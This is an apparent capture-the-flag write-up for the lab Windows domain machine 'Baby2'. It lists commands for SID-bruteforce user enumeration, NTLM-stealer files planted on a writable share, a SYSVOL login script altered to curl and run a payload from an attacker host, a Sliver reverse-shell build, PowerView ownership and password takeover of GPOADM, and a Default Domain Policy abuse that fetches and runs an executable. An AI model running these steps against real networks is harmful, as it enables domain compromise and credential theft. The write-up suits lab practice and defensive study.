Skip to main content

Machine (Medium) - Baby2

Writeup for the Baby2 machine documents the process of compromising a Windows domain through enumeration, credential capture, and privilege escalation.

Writeup Author: BobBuilder

Objective: This writeup details the steps taken to exploit the Baby2 machine, focusing on domain user enumeration, writable share abuse for credential capture, and privilege escalation via ACL and GPO manipulation.

Category Difficulty Platform Machine Author
Machine Medium Windows xct

User

Enumeration

Enumerate Domain Users via SID Bruteforce

impacket-lookupsid baby2.vl/guest:''@<baby2_ip> -no-pass | grep SidTypeUser | awk -F ' ' '{print $2}'
  • Discovers domain users by querying SIDs anonymously.

Extract SPNs for Kerberoasting

impacket-GetUserSPNs -target-domain baby2.vl -usersfile baby2_users.txt baby2.vl/guest -no-pass
  • Attempts to enumerate service accounts with SPNs; one entry for DC$ discovered, potentially roastable.

Initial Access

Prepare NTLM Stealer Payloads

python3 ntlm_theft.py --generate all --server <attacker_ip> --filename nt
  • Generates files to trigger NTLM authentication back to attacker's server.

Upload Payloads to Writable User Folders

for user in "Amelia.Griffiths" "Harry.Shaw" "Kieran.Mitchell" "Mohammed.Harris" \
            "Joan.Jennings" "library" "Nicola.Lamb" "Carl.Moore" "Joel.Hurst" \
            "Lynda.Bailey" "Ryan.Jenkins"; do
    for file in ~/tools/ntlm_theft/nt/*; do
        filename=$(basename "$file")
        nxc smb <baby2_ip> -u 'guest' -p '' --share homes --put-file "$file" "\\$user\\$filename"
    done
done
  • Mass-deploys NTLM stealer files to users’ home directories on the writable SMB share.

Captured Credentials

baby2.vl/library:<REDACTED>
baby2.vl/Carl.Moore:<REDACTED>

Root

Post-Exploitation

Abuse Login Script for Code Execution

' Located in SYSVOL/baby2.vl/scripts/login.vbs
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl <attacker_ip>:8081/vl.exe -o C:\Windows\Temp\vl2.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\vl2.exe"
  • login.vbs in SYSVOL runs on user login; used to download and execute payload.

Generate Sliver Payload

sudo service sliver start
sliver
generate --os windows --arch 64bit --mtls <attacker_ip> --reconnect 60 --save vl.exe
  • Generates and serves a reverse shell with Sliver framework.

Privilege Escalation

BloodHound Enumeration

  • Revealed user Amelia.Griffiths (member of BABY2\LEGACY) has WriteOwner over user GPOADM.

Import PowerView and Take Ownership

Import-Module .\PowerView.ps1
Set-DomainObjectOwner -Identity GPOADM -OwnerIdentity Amelia.Griffiths
Add-DomainObjectACL -TargetIdentity GPOADM -PrincipalIdentity Amelia.Griffiths -Rights All
Set-DomainUserPassword -Identity GPOADM -AccountPassword (ConvertTo-SecureString 'Password1' -AsPlainText -Force)
  • Takes ownership of GPOADM, grants full rights, and sets a known password.

Abuse Default Domain GPO

python3 pygpoabuse.py BABY2.vl/gpoadm:Password1 -gpo-id '31B2F340-016D-11D2-945F-00C04FB984F9' -powershell -command "certutil -urlcache -split -f http://<attacker_ip>/vl.exe C:/Users/Public/vl.exe; C:/Users/Public/vl.exe" -f
  • Modifies the Default Domain Policy to deliver a Sliver payload and execute it.
Back to top